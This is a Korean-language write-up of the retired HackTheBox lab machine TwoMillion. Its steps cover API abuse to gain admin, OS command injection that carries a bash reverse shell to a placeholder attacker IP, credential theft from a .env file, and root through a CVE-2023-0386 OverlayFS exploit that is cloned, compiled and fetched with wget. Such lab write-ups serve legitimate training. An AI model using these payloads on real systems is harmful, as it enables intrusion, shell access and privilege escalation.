
HackTheBox TwoMillion 머신 라이트업 — API 남용, 명령어 주입 및 CVE-2023-0386
HackTheBox TwoMillion 머신 분석기 — API 남용, 명령 삽입 및 CVE-2023-0386
| 필드 | 세부사항 |
|---|---|
| 이름 | TwoMillion |
| 난이도 | 쉬움 |
| 운영체제 | Linux |
| IP | 10.10.11.221 |
| CVE | CVE-2023-0386 |
TwoMillion은 이전 HackTheBox 플랫폼을 주제로 한 쉬운 난이도의 Linux 머신입니다. 초대 코드 디코딩, API 엔드포인트 남용, OS 명령 삽입, 자격 증명 발견, 그리고 CVE-2023-0386 (OverlayFS)를 통한 Linux 커널 권한 상승을 포함합니다.
nmap -sV -sC -v 10.10.11.221
열린 포트:
2million.htb로 리디렉션/etc/hosts에 추가:
echo "10.10.11.221 2million.htb" >> /etc/hosts
curl -X POST http://2million.htb/api/v1/invite/how/to/generate
응답은 ROT13으로 인코딩되어 있습니다. 디코딩하세요:
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'
초대 코드 생성:
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d
디코딩된 초대 코드를 사용하여 http://2million.htb/register에서 등록하세요.
브라우저로 로그인하고 쿠키에서 PHPSESSID를 가져옵니다 (F12 → 애플리케이션 → 쿠키).
관리자로 권한 상승:
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"email":"[email protected]","is_admin":1}'
확인:
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}
리스너 시작:
nc -lvnp 4444
리버스 셸 페이로드 전송:
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'
www-data로 셸 획득.
.env에서 자격 증명 찾기:
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123
SSH 접속:
ssh [email protected]
cat ~/user.txt
힌트 확인:
cat /var/mail/admin
uname -r
# 5.15.70 — vulnerable to CVE-2023-0386
Kali에서 익스플로잇 다운로드 및 컴파일:
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all
타겟으로 전송:
# Kali
python3 -m http.server 8000
# Target
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all
타겟에서 두 개의 터미널로 실행:
Terminal 1:
./fuse ./ovlcap/lower ./gc
Terminal 2:
./exp
루트 플래그 획득:
cat /root/root.txt
이 분석은 은퇴한 HackTheBox 머신에 대한 교육 목적으로만 작성되었습니다.
| 단계 |
|---|
| 기법 |
|---|
| 정찰 | Nmap 스캔 |
| 초대 코드 | ROT13 + Base64 디코딩 |
| 웹 권한 상승 | API 조작 → 관리자 |
| 초기 셸 | OS 명령 삽입 |
| 수평 이동 | .env 자격 증명 → SSH |
| 루트 | CVE-2023-0386 OverlayFS 익스플로잇 |